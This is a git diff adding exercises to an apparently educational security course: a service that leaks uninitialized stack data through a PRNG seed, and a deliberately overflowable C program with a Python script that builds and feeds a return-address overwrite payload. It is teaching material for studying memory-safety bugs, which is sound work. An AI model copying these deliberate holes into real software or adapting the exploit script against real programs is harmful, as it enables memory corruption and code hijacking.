b/examples/uninitialized_data/Makefile @@ -0,0 +1,20 @@ +SERVER = random_svc +CLIENT = random_client +PSEUDO = pseudo_random +BINS = $(SERVER) $(CLIENT) $(PSEUDO) +FLAGS = -g -O0 +HEADERS = common.h + +all: $(BINS) + +$(SERVER): random_svc.c $(HEADERS) + gcc $(FLAGS) $< -o $@ + +$(CLIENT): random_client.c $(HEADERS) + gcc $(FLAGS) $< -o $@ + +$(PSEUDO): pseudo_random.c $(HEADERS) + gcc $(FLAGS) $< -o $@ + +clean: + rm -f $(BINS) diff --git a/examples/uninitialized_data/README.md b/examples/uninitialized_data/README.md new file mode 100644 index 0000000..ca684e9 --- /dev/null +++ b/examples/uninitialized_data/README.md @@ -0,0 +1,63 @@ +Unitialized Data on the Stack +============================= + +This application has an issue with uninitialized data on the stack. + +It's a made up scenario of a program trying to provide a _random number +service_. The program `random_svc` listens on a local udp port waiting for +requests. The program `random_client` can ask the service to generate a random +number by calling `rand()` a given number of times. + +You can ignore the UDP communication code in this example. It's just a vehicle +for demonstrating this use case. + +Note about Random Numbers +========================= + +Good random data is a valuable commodity when dealing with cryptography. It is +not possible, for example, to create a secure private GPG key, SSH key or SSL +private key without high quality random numbers. + +The '/dev/random' device returns such data from the kernel that is gathered +from various sources such as random events like interrupts, noise on the +hardware level or some dedicated hardware random number generator. +The device '/dev/urandom' ('u' for unlimited) provides pseudo random data that +is based on the real random data gathered from hardware. + +Because there's no large amount of really unique random data available, a +typical approach in many applications is either to use data from +'/dev/urandom' or to just get a little of real random data and feed a pseudo +random number generator in userspace with it. The latter is a software +algorithm that returns randomly distributed numbers. For it to work it has to +be seeded with some truly random data, before it can be used. For the same +seed value the pseudo random number generator will always return the same +sequence of pseudo random numbers. + +The corresponding C library calls are `srand()` and `rand()`. The discussed +approach is used in the `random_svc` program in this example. + +A Note about Compiler Optimizations +=================================== + +The weakness modeled in this example does only work when compiler +optimizations are disabled (`-O0`). Otherwise the stack based variables are +likely to be moved into registers, which will not leak so easily onto the +stack. + +In real world examples when many variables are put onto the stack this will +result in a mixture between variables put onto the stack and variables put in +registers. For some operations and calculations intermediate values are likely +to end up on the stack at times. Larger buffers always need to stay on the +stack (or the heap) So information leaks from the stack are still interesting +in real world scenarios. + +Exercises +========= + +- Can you make out the unitialized data in the service implementation? +- Can we obtain the uninitialized data on the client side via some code path? +- Experiment with the uninitialized data you get, can you think of some way to + exploit it? +- The utility `pseudo_random` will print on stdout the N-th number returned by + the pseudo random number generator for a given SEED value. You can use this + to test an exploit of the unitizialited data issue. diff --git a/examples/uninitialized_data/common.h b/examples/uninitialized_data/common.h new file mode 100644 index 0000000..01b719a --- /dev/null +++ b/examples/uninitialized_data/common.h @@ -0,0 +1,22 @@ +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +unsigned long int parse_integer(const char *arg, size_t base) { + unsigned long int ret = 0; + char *endptr = NULL; + + ret = strtoul(arg, &endptr, base); + + if (endptr == arg) { + fprintf(stderr, "Failed to parse integer from '%s'.\n", arg); + exit(1); + } + + return ret; +} diff --git a/examples/uninitialized_data/pseudo_random.c b/examples/uninitialized_data/pseudo_random.c new file mode 100644 index 0000000..0bc7760 --- /dev/null +++ b/examples/uninitialized_data/pseudo_random.c @@ -0,0 +1,44 @@ +#include +#include + +#include "common.h" + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This program simply prints the result of COUNT random() calls when seeding + * the pseudo random generator with a given SEED. + */ + +const size_t MAX_COUNT = 64; + +int main(int argc, char **argv) { + unsigned int seed = 0; + size_t count = 0; + + if (argc != 3) { + fprintf(stderr, "Usage: %s \n", argv[0]); + fprintf(stderr, "\nOutputs a series of pseudo-random numbers based on \n"); + return 1; + } + + seed = parse_integer(argv[1], 0); + count = parse_integer(argv[2], 10); + + if (count > MAX_COUNT) { + fprintf(stderr, "Requested count %zu exceeds maximum count %zu\n", count, MAX_COUNT); + return 1; + } + + srand(seed); + + while (count--) { + printf("%u\n", rand()); + } + + return 0; +} diff --git a/examples/uninitialized_data/random_client.c b/examples/uninitialized_data/random_client.c new file mode 100644 index 0000000..7ae3dc2 --- /dev/null +++ b/examples/uninitialized_data/random_client.c @@ -0,0 +1,127 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "common.h" + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This is a demo client that connects to a server listening on a given UDP + * port and requests a pseudo random number resulting from ROUND numbers of + * random() calls on the server side. + */ + +/* + * socket code + */ + +int create_and_connect_socket(in_port_t port) { + /* + * use an UDP socket on a local port for receiving requests for random + * numbers + */ + const struct sockaddr_in local_addr = { + AF_INET, + port, + { htonl(INADDR_LOOPBACK) } + }; + int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); + + if (sock == -1) { + fprintf(stderr, "Failed to create socket: %s\n", strerror(errno)); + return sock; + } + + if (connect(sock, (struct sockaddr*)&local_addr, sizeof(local_addr)) != 0) { + fprintf(stderr, "Failed to connect socket to port %d: %s\n", port, strerror(errno)); + (void) close(sock); + return -1; + } + + return sock; +} + +int send_req(int sock, size_t rounds) { + ssize_t bytes_transferred = 0; + + bytes_transferred = send( + sock, + &rounds, + sizeof(rounds), + 0 /* no flags */ + ); + + if (bytes_transferred != sizeof(rounds)) { + fprintf(stderr, "Failed to send request: %s\n", + strerror(errno)); + return -1; + } + + return 0; +} + +int recv_reply(int sock, uint64_t *random_nr) { + ssize_t bytes_transferred = 0; + + bytes_transferred = recv( + sock, + random_nr, + sizeof(*random_nr), + 0 + ); + + if (bytes_transferred != sizeof(*random_nr)) { + fprintf(stderr, "Failed to receive reply: %s\n", + strerror(errno)); + return -1; + } + + return 0; +} + +int main(const int argc, const char **argv) { + in_port_t port = 0; + int socket = -1; + size_t rounds = 0; + uint64_t random_nr = 0; + + if (argc != 3) { + fprintf(stderr, "usage: %s \n", argv[0]); + fprintf(stderr, "\nRequests the ROUNDS'th random number " + "from the random_nr service running on UDP localhost " + "port \n"); + return 1; + } + + port = parse_integer(argv[1], 10); + rounds = parse_integer(argv[2], 10); + + socket = create_and_connect_socket(port); + + if (socket == -1) + return 1; + + if (send_req(socket, rounds) != 0) + return 1; + + if (recv_reply(socket, &random_nr) != 0) + return 1; + + printf("Got random nr %lu\n", random_nr); + + (void)close(socket); + + return 0; +} diff --git a/examples/uninitialized_data/random_svc.c b/examples/uninitialized_data/random_svc.c new file mode 100644 index 0000000..8f89345 --- /dev/null +++ b/examples/uninitialized_data/random_svc.c @@ -0,0 +1,219 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "common.h" + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This is a demo server listening on a given UDP port for requests to return + * a pseudo random number. Clients can pass a parameter that + * determines the number of random() calls the server should perform before + * returning the result. + */ + +static const size_t MAX_ROUNDS = 64; +static int initialized_random = 0; + +/* + * random generator code + */ + +bool read_real_random(char *to, size_t bytes) { + ssize_t all_read = 0; + ssize_t just_read = 0; + /* read some high quality random data from /dev/random */ + int fd = open("/dev/random", O_RDONLY | O_CLOEXEC); + + if (fd == -1) { + fprintf(stderr, "Failed to open random device: %s\n", + strerror(errno)); + return false; + } + + while (all_read != bytes) { + just_read = read(fd, to + all_read, bytes - all_read); + + if (just_read == -1) { + fprintf(stderr, "Failed to read from random device: %s\n", + strerror(errno)); + return false; + } + + all_read += just_read; + } + + (void) close(fd); + return true; +} + +bool init_random() { + unsigned int seed = 0; + bool ret; + + ret = read_real_random((char*)&seed, sizeof(seed)); + printf("Using RNG seed %u\n", (unsigned int)seed); + + srand(seed); + return ret; +} + +uint64_t gen_random(size_t rounds) { + uint64_t ret; + + for (size_t round = 0; round < rounds; round++) { + ret = (uint64_t)random(); + } + + return ret; +} + +/* + * socket code + */ + +int create_and_bind_socket(in_port_t port) { + /* + * use an UDP socket on a local port for receiving requests for random + * numbers + */ + const struct sockaddr_in local_addr = { + AF_INET, + port, + { htonl(INADDR_LOOPBACK) } + }; + int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); + + if (sock == -1) { + fprintf(stderr, "Failed to create socket: %s\n", strerror(errno)); + return sock; + } + + if (bind(sock, (struct sockaddr*)&local_addr, sizeof(local_addr)) != 0) { + fprintf(stderr, "Failed to bind socket to port %d: %s\n", port, strerror(errno)); + (void) close(sock); + return -1; + } + + return sock; +} + +struct request { + struct sockaddr_in requestor; + size_t rounds; + uint64_t reply; +}; + +int get_next_req(int sock, struct request *req) { + ssize_t bytes_recvd = 0; + socklen_t addrlen = sizeof(req->requestor); + + memset(req, 0, sizeof(*req)); + + bytes_recvd = recvfrom( + sock, + &(req->rounds), + sizeof(req->rounds), + 0 /* no flags */, + (struct sockaddr*)&(req->requestor), + &addrlen + ); + + if (bytes_recvd == -1 || addrlen != sizeof(req->requestor)) { + fprintf(stderr, "Failed to receive request: %s\n", strerror(errno)); + return -1; + } else if (bytes_recvd != sizeof(req->rounds)) { + fprintf(stderr, "Short read of %ld bytes instead of %ld bytes\n", + bytes_recvd, sizeof(req->rounds) + ); + return -1; + } + + return 0; +} + +int reply_to_req(int sock, const struct request *req) { + ssize_t sent_bytes = sendto( + sock, + &(req->reply), + sizeof(req->reply), + 0 /* no flags */, + (struct sockaddr*)&(req->requestor), + sizeof(req->requestor) + ); + + if (sent_bytes != sizeof(req->reply)) { + printf("Failed to reply to request: %ld %s\n", sent_bytes, strerror(errno)); + return -1; + } + + return 0; +} + +/* + * main + */ + +int main(const int argc, const char **argv) { + in_port_t port = 0; + int socket = -1; + struct request req; + + if (argc != 2) { + printf("usage: %s \n", argv[0]); + printf("\nListens on the given UDP port for requests for random numbers\n"); + return 1; + } + + port = parse_integer(argv[1], 10); + + socket = create_and_bind_socket(port); + + if (socket == -1) { + return 1; + } + + /* service any clients */ + while (1) { + if (get_next_req(socket, &req) != 0) + break; + + if (req.rounds > MAX_ROUNDS) { + printf("Requested %lu rounds exceeds limit, reducing to %lu rounds\n", + req.rounds, + MAX_ROUNDS + ); + + req.rounds = MAX_ROUNDS; + } + + if (!initialized_random) { + if (!init_random()) + break; + initialized_random = 1; + } + + req.reply = gen_random(req.rounds); + + if (reply_to_req(socket, &req) != 0) + break; + } + + (void) close(socket); + + return 1; +} diff --git a/examples/zombie_call/.gitignore b/examples/zombie_call/.gitignore new file mode 100644 index 0000000..e6feb0f --- /dev/null +++ b/examples/zombie_call/.gitignore @@ -0,0 +1 @@ +kitty diff --git a/examples/zombie_call/Makefile b/examples/zombie_call/Makefile new file mode 100644 index 0000000..ba91abd --- /dev/null +++ b/examples/zombie_call/Makefile @@ -0,0 +1,18 @@ +MAIN = kitty +SOURCES = $(wildcard *.c) +OBJECTS = $(SOURCES:.c=.o) +# NOTE: without -no-pie, objdump will not deliver us the runtime address, +# because the code is relocated. Therefore to simplify the demo we add this +# flag here. +FLAGS = -fno-omit-frame-pointer -fno-stack-protector -O0 -g -Wall -no-pie + +$(MAIN): $(OBJECTS) + gcc $(FLAGS) $(OBJECTS) -o $(MAIN) + +%.o: %.c + gcc -c $(FLAGS) $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) + +include ../common/Makefile diff --git a/examples/zombie_call/README.md b/examples/zombie_call/README.md new file mode 100644 index 0000000..7ef5157 --- /dev/null +++ b/examples/zombie_call/README.md @@ -0,0 +1,18 @@ +Returning to a Different Function than Intended +=============================================== + +This program also contains a typical buffer overflow vulnerability like the +previous example did. This time we want to replace the return address such +that the function `zombie()` is called upon return. + +Exercises +========= + +- Experiment with different overflow patterns and see what happens during + program execution. +- What could be a way to determine exactly where the new return address needs + to go in the overflow data? +- The accompanying python program `call_zombie.py` automates some of the tasks + like determining the address of `zombie()` in the program, creating a + suitable exploit payload and feeding it to the vulnerable program. You can + experiment with different parameters. diff --git a/examples/zombie_call/call_zombie.py b/examples/zombie_call/call_zombie.py new file mode 100755 index 0000000..bb7042e --- /dev/null +++ b/examples/zombie_call/call_zombie.py @@ -0,0 +1,227 @@ +#!/usr/bin/python3 + +import argparse +import functools +import os +import subprocess +import sys + +# Matthias Gerstner +# SUSE Linux GmbH +# matthias.gerstner@suse.com + + +def getFunctionAddressFromObjdump(prog, func): + # try to find out the address of the function via objdump + out = subprocess.check_output(["/usr/bin/objdump", "-t", prog]) + + for line in out.decode().splitlines(): + + parts = line.split() + + if not parts or parts[-1] != func: + continue + + return parts[0] + + raise Exception("Failed to determine function adderss from objdump") + + +def getFunctionAddressFromGdb(prog, func): + # more elaborate version that uses gdb to determine the runtime + # address + out = subprocess.check_output( + [ + "/usr/bin/gdb", prog, + "-ex", "start", + "-ex", f"print {func}", + "-batch" + ] + ).decode() + + lastline = out.splitlines()[-1].strip() + + var = None + addr = None + label = None + + for part in lastline.split(): + if not var: + var = part + elif not addr and part.startswith("0x"): + addr = part + elif not label and part[0] + part[-1] == "<>": + label = part + + if not var or not addr or not label: + raise Exception("Couldn't parse gdb output") + + if var != "$1" or label.strip('<>') != func: + raise Exception("gdb parse error") + + return addr + + +def getFunctionAddress(prog, func): + return getFunctionAddressFromGdb(prog, func) + + +def getSignalName(sig): + import signal + return signal.Signals(sig).name + + +def findSegfaultAddress(start_addr): + dmesg_bin = None + for cand in ("/usr/bin/dmesg", "/bin/dmesg"): + if os.path.exists(cand): + dmesg_bin = cand + break + + if not dmesg_bin: + raise Exception("No dmesg found") + + dmesg = subprocess.check_output([dmesg_bin]) + + lines = dmesg.decode().splitlines()[-3:-1] + lines.reverse() + segfault_line = None + + for line in lines: + + if line.find("segfault at") != -1: + segfault_line = line + + if not segfault_line: + print("couldn't find segfault address in last dmesg line:", line) + sys.exit(1) + + next_is_addr = False + segfault_addr = None + for part in segfault_line.split(): + if part == "at": + next_is_addr = True + elif next_is_addr: + segfault_addr = int(part, 16) + break + + if not segfault_addr: + print("failed to extract segfault address from dmesg line:", segfault_line) + sys.exit(1) + + print("segfault address was:", hex(segfault_addr)) + + offset = segfault_addr - start_addr + print("return address is", offset * 8, "bytes into overflow buffer") + + +parser = argparse.ArgumentParser( + description="Tries to exploit a stack overflow by executing some other function on return." +) + +parser.add_argument( + "-p", "--program", help="The program to exploit. This needs to accept input on stdin that will lead to an overflow.", + default="kitty" +) + +parser.add_argument( + "-f", "--function", help="Name of the function to call upon return.", + default="zombie" +) + +parser.add_argument( + "-c", "--count", help="Number of times to feed to the desired return address to the exploitable program's stdin.", + default=8, + type=int +) + +parser.add_argument( + "-a", "--address", help="Use this specific address as return address.", + type=functools.partial(int, base=16), + default=None +) + +parser.add_argument( + "-w", "--pattern", help="Instead of calling a function, use a pattern for the stack overflow for exactly determining the return address location.", + action='store_true', + default=False +) + +parser.add_argument( + "-o", "--output", help="Instead of calling the vulnerable program, just output the exploit buffer to stdout.", + action='store_true', default=False +) + +args = parser.parse_args() + +prog = args.program + +if not os.path.isabs(prog): + prog = os.path.join(os.getcwd(), prog) + +if not os.path.exists(prog): + print("Couldn't find program to exploit in", prog) + sys.exit(1) + +if args.pattern: + overflow_data = bytes() + + # avoid null byte and newline(s) + # we can't use all FF's because AMD64 only supports 48 bit addressing + # and this would result in a general protection fault that doesn't + # expose the violation address in dmesg so easily. + start_addr = 0x0000FFFFFFFFFF + ord('A') + for addr in range(start_addr, start_addr + args.count): + addr_bin = addr.to_bytes(8, byteorder='little', signed=False) + overflow_data += addr_bin +elif args.address: + # use the provided address + address_bin = args.address.to_bytes( + 8, byteorder='little', signed=False) + overflow_data = args.count * address_bin +else: + # obtain the function's address by inspecting the program + addr = getFunctionAddress(prog, args.function) + + if not args.output: + print(">>> Using function address", addr) + addr = int(addr, 16) + # transform into a binary representation of the 64-bit return address + # we want to write onto the stack + address_bin = addr.to_bytes(8, byteorder='little', signed=False) + + overflow_data = args.count * address_bin + +if args.output: + + if os.isatty(sys.stdout.fileno()): + # write as hexdump if stdout is a terminal + for bt in overflow_data: + print("\\x" + format(bt, '02x'), end='') + + print() + else: + # write as binary if stdout is something else + os.write(sys.stdout.fileno(), overflow_data) + + sys.exit(0) + +process = subprocess.Popen([prog], stdin=subprocess.PIPE) + +process.stdin.write(overflow_data) +process.stdin.close() + +res = process.wait() +print() +print(">>>", args.program, "exited with", res, end='') +if res == 0: + print("didn't segfault") + sys.exit(0) +elif res < 0: + print(" ({})".format(getSignalName(abs(res)))) +else: + print() + +if args.pattern: + findSegfaultAddress(start_addr) + sys.exit(0) diff --git a/examples/zombie_call/kitty.c b/examples/zombie_call/kitty.c new file mode 100644 index 0000000..6432e98 --- /dev/null +++ b/examples/zombie_call/kitty.c @@ -0,0 +1,39 @@ +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + * + * This is a poorly implemented `cat` like program that for some reason also + * ships dead code, the function zombie(), that is never called. Or is it? + */ + +void zombie() { + printf("I shouldn't live!\n"); +} + +void cat() { + char text[32]; + int i; + + // puts a well defined pattern into the text buffer + for (i = 0; i < 32; i++) { + text[i] = i; + } + + while (1) { + scanf("%[^\n]", text); + // eat the newline, act on possible EOF condition + if (getchar() == EOF) + break; + printf("%s\n", text); + } +} + +int main() { + cat(); + + return 0; +} diff --git a/images/addr_space_layout1.png b/images/addr_space_layout1.png new file mode 100644 index 0000000000000000000000000000000000000000..b398787436fb1f580141f64da98405527638d318 GIT binary patch literal 25642 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 